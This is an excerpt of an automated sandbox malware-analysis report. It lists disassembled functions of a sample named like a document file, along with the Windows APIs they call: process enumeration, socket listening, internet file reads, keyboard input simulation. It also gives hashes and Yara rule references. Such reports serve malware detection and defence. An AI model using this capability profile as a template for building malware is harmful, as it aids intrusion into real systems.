                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$bindclosesocketlistensocket
                                                        • String ID:
                                                        • API String ID: 1279440585-0
                                                        • Opcode ID: f9ae9dbc76147bd80e7f031b07085a1e128975ce90cfcf826b5e132b6132c5b7
                                                        • Instruction ID: 820a31f68de90e743d1ecb85c7363f48b2d9a714407d784796b634bf65b72577
                                                        • Opcode Fuzzy Hash: f9ae9dbc76147bd80e7f031b07085a1e128975ce90cfcf826b5e132b6132c5b7
                                                        • Instruction Fuzzy Hash: EA21A231600200EFCB10EF64D959B6EB7A9FF48324F108159F957A72D1C778AD42CB51
                                                        Function 00756F5B Relevance: 9.1, APIs: 6, Instructions: 71processCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00756F7D
                                                        • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00756F8D
                                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 00756FAC
                                                        • __wsplitpath.LIBCMT ref: 00756FD0
                                                        • _wcscat.LIBCMT ref: 00756FE3
                                                        • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00757022
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                                        • String ID:
                                                        • API String ID: 1605983538-0
                                                        • Opcode ID: ede964e3fdc67226a15c5eb3f2b505c78c1e922164ff4171156f4d0e48a72b3c
                                                        • Instruction ID: b847f6c351c0c044003bd24319611e0cb7211f03bcf87316184bb5bd44f90354
                                                        • Opcode Fuzzy Hash: ede964e3fdc67226a15c5eb3f2b505c78c1e922164ff4171156f4d0e48a72b3c
                                                        • Instruction Fuzzy Hash: 99216871904218EBDB20AB94DC89BEEB7FCAB48311F5004A5F945D3141E7B99F85CB60
                                                        Function 00716670 Relevance: 8.1, APIs: 2, Strings: 2, Instructions: 1093COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: _memmove
                                                        • String ID: hN|$tM|
                                                        • API String ID: 4104443479-1284067220
                                                        • Opcode ID: fff6444839c41ec4e22658f3ea3d51c218407161f6df746bfe5f2d924ce0830f
                                                        • Instruction ID: fb6f5b2ea7d47d8d57a018a0f4a87cd0a977f8fafcbdc92717449eefbf6d0025
                                                        • Opcode Fuzzy Hash: fff6444839c41ec4e22658f3ea3d51c218407161f6df746bfe5f2d924ce0830f
                                                        • Instruction Fuzzy Hash: 5FA23975E00219DFCF28CF58D4806EDBBB1BF48314F2581AAD859AB391D7389E81DB90
                                                        Function 0071A0C0 Relevance: 8.0, APIs: 5, Instructions: 514COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0073010A: std::exception::exception.LIBCMT ref: 0073013E
                                                          • Part of subcall function 0073010A: __CxxThrowException@8.LIBCMT ref: 00730153
                                                        • _memmove.LIBCMT ref: 00783020
                                                        • _memmove.LIBCMT ref: 00783135
                                                        • _memmove.LIBCMT ref: 007831DC
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                        • String ID:
                                                        • API String ID: 1300846289-0
                                                        • Opcode ID: a11b8e5ee04eec29d03f77594ecf139e0cf9b7a4a73526a9b763d8a89e8a1b6a
                                                        • Instruction ID: 9e27f86de3b0218dfcdd2ba64dbbf344d7019137319c00f833b3a7e8cc9d1a65
                                                        • Opcode Fuzzy Hash: a11b8e5ee04eec29d03f77594ecf139e0cf9b7a4a73526a9b763d8a89e8a1b6a
                                                        • Instruction Fuzzy Hash: 6702A270A00209EFDF04DF68D885AAE77B5FF48700F148069E806DB296EB39DE55CB95
                                                        Function 007696E2 Relevance: 7.6, APIs: 5, Instructions: 146networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0076ACD3: inet_addr.WS2_32(00000000), ref: 0076ACF5
                                                        • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 0076973D
                                                        • WSAGetLastError.WS2_32(00000000,00000000), ref: 00769760
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: ErrorLastinet_addrsocket
                                                        • String ID:
                                                        • API String ID: 4170576061-0
                                                        • Opcode ID: 21c08bab80342f3fb1dfec3f611038ace9ebfe78176f459c51b36282016c2d08
                                                        • Instruction ID: ad71e2fce61b5d4b1489ca8db1eaaca770b269e3436ab26239cc7f7327fb6dec
                                                        • Opcode Fuzzy Hash: 21c08bab80342f3fb1dfec3f611038ace9ebfe78176f459c51b36282016c2d08
                                                        • Instruction Fuzzy Hash: 4841C770600110EFDB10AF68CC56E6E77EDEF48724F148059F956AB3D2DB78AE418B91
                                                        Function 0075F350 Relevance: 7.6, APIs: 5, Instructions: 125fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(?,?), ref: 0075F37A
                                                        • _wcscmp.LIBCMT ref: 0075F3AA
                                                        • _wcscmp.LIBCMT ref: 0075F3BF
                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 0075F3D0
                                                        • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0075F3FE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Find$File_wcscmp$CloseFirstNext
                                                        • String ID:
                                                        • API String ID: 2387731787-0
                                                        • Opcode ID: 5f3d53c0e965c52725d1826ea248996161a7f822d54fa72906cae813067d7c78
                                                        • Instruction ID: 6f4265282b373a36369ea38003ed57de2825ebdd232a4291009f2bd122f28122
                                                        • Opcode Fuzzy Hash: 5f3d53c0e965c52725d1826ea248996161a7f822d54fa72906cae813067d7c78
                                                        • Instruction Fuzzy Hash: 3441AC75604301DFC718DF28C494A9AB3E4FF49324F10816DE95A8B3A2DB79AD49CB91
                                                        Function 00754342 Relevance: 6.1, APIs: 4, Instructions: 112keyboardwindowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 0075439C
                                                        • SetKeyboardState.USER32(00000080,?,00000001), ref: 007543B8
                                                        • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 00754425
                                                        • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00754483
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: KeyboardState$InputMessagePostSend
                                                        • String ID:
                                                        • API String ID: 432972143-0
                                                        • Opcode ID: b540ab9bfb4ca6e63ab412fc5709541b5e31acc67ece8aa4a8e46b64a212b417
                                                        • Instruction ID: 16222ed3aa6889b4a71794216ab66b15f22b113b7abce69578f9680f2e10ecef
                                                        • Opcode Fuzzy Hash: b540ab9bfb4ca6e63ab412fc5709541b5e31acc67ece8aa4a8e46b64a212b417
                                                        • Instruction Fuzzy Hash: 904106B0D44288AAEF348B6498087FD7BB5AB4531BF04011AE881932D1C7FC8DDD9765
                                                        Function 0077EFA8 Relevance: 6.1, APIs: 4, Instructions: 80nativewindowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0072AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0072AF8E
                                                        • GetCursorPos.USER32(?), ref: 0077EFE2
                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0078F3C3,?,?,?,?,?), ref: 0077EFF7
                                                        • GetCursorPos.USER32(?), ref: 0077F041
                                                        • NtdllDialogWndProc_W.NTDLL(?,0000007B,?,?,?,?,?,?,?,?,?,?,0078F3C3,?,?,?), ref: 0077F077
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Cursor$DialogLongMenuNtdllPopupProc_TrackWindow
                                                        • String ID:
                                                        • API String ID: 1423138444-0
                                                        • Opcode ID: 6cca792c8040ff76f1cf81e1f46d5af40d433dd0314686b6c31ae6745558202e
                                                        • Instruction ID: 3be78475cc21b4311f17f5be0cf306464183cac0df753ef5aa8ee859f9711e2b
                                                        • Opcode Fuzzy Hash: 6cca792c8040ff76f1cf81e1f46d5af40d433dd0314686b6c31ae6745558202e
                                                        • Instruction Fuzzy Hash: 0221B135600118FFCF258F54DC98EEA7BB5EB497A4F448069F909473A2C3399D61EBA0
                                                        Function 0071DCD0 Relevance: 5.8, APIs: 2, Strings: 1, Instructions: 540COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: G-q
                                                        • API String ID: 0-2377931026
                                                        • Opcode ID: f4507e89bcb7e970c3a8e380cea039d6998c7f17593afdd8bb45603d7a52d699
                                                        • Instruction ID: fde02c1b9dd65988f0015eb3dfb08a3a82ca7150cd6f525e787e7465d4973d49
                                                        • Opcode Fuzzy Hash: f4507e89bcb7e970c3a8e380cea039d6998c7f17593afdd8bb45603d7a52d699
                                                        • Instruction Fuzzy Hash: A122AE71A00209DFDB24DF58C494AEAB7F1FF18300F148069E8569B391E779ADC5CB91
                                                        Function 0075220C Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 560stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • lstrlenW.KERNEL32(?,?,?,00000000), ref: 0075221E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: lstrlen
                                                        • String ID: ($|
                                                        • API String ID: 1659193697-1631851259
                                                        • Opcode ID: 5702ddd1118af60b8a0a8f7cace0d73a599e264b163af6bf735b639d279bf3bf
                                                        • Instruction ID: 3074ba50dca71dd55e61708317c742f202270160fec62fb22308d447d2e229f2
                                                        • Opcode Fuzzy Hash: 5702ddd1118af60b8a0a8f7cace0d73a599e264b163af6bf735b639d279bf3bf
                                                        • Instruction Fuzzy Hash: 07322875A00605DFC728CF59C480AAAB7F0FF49310B15C46EE99ADB7A2D7B4E942CB44
                                                        Function 0072AD5C Relevance: 4.9, APIs: 3, Instructions: 378nativeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0072AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0072AF8E
                                                        • NtdllDialogWndProc_W.NTDLL(?,?,?,?,?), ref: 0072AE5E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: DialogLongNtdllProc_Window
                                                        • String ID:
                                                        • API String ID: 2065330234-0
                                                        • Opcode ID: ccbe442d9f208df43a495215f7169e138770eaa529315b8f5fb002ec6c7a872c
                                                        • Instruction ID: eefc6a94060b8081edb25db3685a79e151ba75c3227d0b382c35a47ba2a2c01c
                                                        • Opcode Fuzzy Hash: ccbe442d9f208df43a495215f7169e138770eaa529315b8f5fb002ec6c7a872c
                                                        • Instruction Fuzzy Hash: 07A14C60504224FBDF28BB296D8ED7F3A6CEB46790B11812EF406D61A5CA1DCC02E373
                                                        Function 0076550C Relevance: 4.7, APIs: 3, Instructions: 155networkfileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00764A1E,00000000), ref: 007655FD
                                                        • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00765629
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Internet$AvailableDataFileQueryRead
                                                        • String ID:
                                                        • API String ID: 599397726-0
                                                        • Opcode ID: 828652d39b348fceb3bfd7de5184e71e63d762d404dfe2fdfb30960f69440e60
                                                        • Instruction ID: 5c7bc1000bc3e6b2d5d21e5914590b39f0473e561dffb4c52f8e16544004b4d7
                                                        • Opcode Fuzzy Hash: 828652d39b348fceb3bfd7de5184e71e63d762d404dfe2fdfb30960f69440e60
                                                        • Instruction Fuzzy Hash: 6241E971500609FFEB219E95CC89EBF77BDEB40718F10401EFA0766141DA799E41EB64
                                                        Function 0075EA85 Relevance: 4.6, APIs: 3, Instructions: 72COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetErrorMode.KERNEL32(00000001), ref: 0075EA95
                                                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0075EAEF
                                                        • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0075EB3C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: ErrorMode$DiskFreeSpace
                                                        • String ID:
                                                        • API String ID: 1682464887-0
                                                        • Opcode ID: 15d16b34c1747bb62639181e891daa0e77dddeab48546bf81b7dd7ee45261e52
                                                        • Instruction ID: 19289c14f89bcb3f4ed745addd95b1973690913edbfeb424a8cf088273d02b7b
                                                        • Opcode Fuzzy Hash: 15d16b34c1747bb62639181e891daa0e77dddeab48546bf81b7dd7ee45261e52
                                                        • Instruction Fuzzy Hash: 59216075A00218EFCB00EFA5D894EEDBBB5FF48310F14809AE905AB351DB35D956CB50
                                                        Function 0075702F Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0075704C
                                                        • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 0075708D
                                                        • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00757098
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: CloseControlCreateDeviceFileHandle
                                                        • String ID:
                                                        • API String ID: 33631002-0
                                                        • Opcode ID: 1442534ce4ba788a2e97be5a5775ed3ae27f96c3737745446a9f11b6fa252e1c
                                                        • Instruction ID: ea6199e39d87d79d5fd71bc576c6af4e555ef1bc4d711feb0aa15028fd7e0ca4
                                                        • Opcode Fuzzy Hash: 1442534ce4ba788a2e97be5a5775ed3ae27f96c3737745446a9f11b6fa252e1c
                                                        • Instruction Fuzzy Hash: 67113071A01228BFDB108B94DC45AEEBBFCEB45B10F108152F904E7290D6B45E058BA5
                                                        Function 0072AFB4 Relevance: 3.1, APIs: 2, Instructions: 82nativeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0072AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0072AF8E
                                                          • Part of subcall function 0072B155: GetWindowLongW.USER32(?,000000EB), ref: 0072B166
                                                        • GetParent.USER32(?), ref: 0078F4B5
                                                        • NtdllDialogWndProc_W.NTDLL(?,00000133,?,?,?,?,?,?,?,?,0072ADDD,?,?,?,00000006,?), ref: 0078F52F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: LongWindow$DialogNtdllParentProc_
                                                        • String ID:
                                                        • API String ID: 314495775-0
                                                        • Opcode ID: c19f8ea27ea79a027300b028a6f9941f682b68a7eb2c34fb2e909ca92a6e4ed2
                                                        • Instruction ID: d9893bc2cb38620b00dee01194df0ffea5feba0391d65bfe5975903d6f67b939
                                                        • Opcode Fuzzy Hash: c19f8ea27ea79a027300b028a6f9941f682b68a7eb2c34fb2e909ca92a6e4ed2
